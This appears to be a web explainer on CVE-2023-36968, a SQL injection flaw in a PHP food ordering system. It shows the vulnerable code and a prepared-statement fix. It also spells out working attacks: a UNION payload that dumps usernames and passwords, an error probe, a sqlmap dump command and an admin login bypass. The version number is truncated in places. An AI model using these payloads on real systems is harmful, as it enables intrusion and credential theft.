CVE-2023-36968 - SQL Injection in Food Ordering System v1. – Full Exploit Guide

CVE-2023-36968 is a critical security hole affecting the popular open-source Food Ordering System version 1.. Discovered in 2023, it allows attackers to run any database command they wish by sneaking special SQL code into the id parameter. This vulnerability is easy to exploit – and unless you patch your application, your users' data, admin accounts, and even your server could be at risk.

This guide gives you a full run-down in plain English, with code, examples, and references to everything you need to know.

Type: SQL Injection

- CVE-ID: CVE-2023-36968

Component: id GET parameter

- Impact: Database read/write, authentication bypass, possible remote code execution

References:

- Exploit-DB 51537
- NVD CVE-2023-36968

How the Vulnerability Works

The Food Ordering System v1. uses PHP and MySQL. Certain pages (like view_item.php) trust user input too much. When you open a URL like this:

http://yourserver/view_item.php?id=12

The code behind it basically does something like

<?php
// BAD: No input sanitization!
$id = $_GET['id'];
$sql = "SELECT * FROM items WHERE id = $id";
$result = mysqli_query($conn, $sql);
?>

If an attacker changes the URL and enters malicious SQL, the database will blindly process it!

Example Malicious Input

http://yourserver/view_item.php?id=12 UNION SELECT 1,username,password FROM users--

It ends up running

SELECT * FROM items WHERE id = 12 UNION SELECT 1,username,password FROM users--

This lets the attacker download all usernames and passwords!

Here’s a simplified snippet of the kind of PHP code at fault

<?php
// Vulnerable because $id isn't sanitized or parameterized
$id = $_GET['id'];
$query = "SELECT * FROM items WHERE id = $id";
$result = mysqli_query($conn, $query);
while ($row = mysqli_fetch_assoc($result)) {
    echo $row['name'];
}
?>

Any user controlling id can inject their own SQL commands.

Try adding an apostrophe to the URL

http://target/view_item.php?id=1';

If you see a SQL syntax error, the site is probably vulnerable.

To dump usernames and (hashed or plain) passwords, use a classic UNION injection

http://target/view_item.php?id=1 UNION SELECT 1,username,password FROM users--

The easiest way to exploit is to use sqlmap

sqlmap -u "http://target/view_item.php?id=1"; --dump

Username

admin' -- 

Password

anything

If the code does

SELECT * FROM users WHERE username='admin' -- ' AND password='anything'

The password part is commented out, and you get in as admin!

How to Fix

NEVER use user input directly in SQL! Use parameterized queries or at least cast types.

Simple Fix Example

// Using prepared statements
$id = intval($_GET['id']);
$stmt = $conn->prepare("SELECT * FROM items WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Or use PDO

$id = $_GET['id'];
$stmt = $pdo->prepare("SELECT * FROM items WHERE id = :id");
$stmt->execute(['id' => $id]);

Summary

- CVE-2023-36968 in Food Ordering System v1. lets hackers steal, change, or delete data using SQL Injection via the id parameter.

Patch your codefast by switching to parameterized queries!

Read more:
- Official NVD entry
- Exploit-DB 51537 PoC
- sqlmap tool

Stay protected. If you’re running Food Ordering System v1., update now or fix the code as shown above!

Timeline

Published on: 07/06/2023 14:15:00 UTC
Last modified on: 07/10/2023 14:05:00 UTC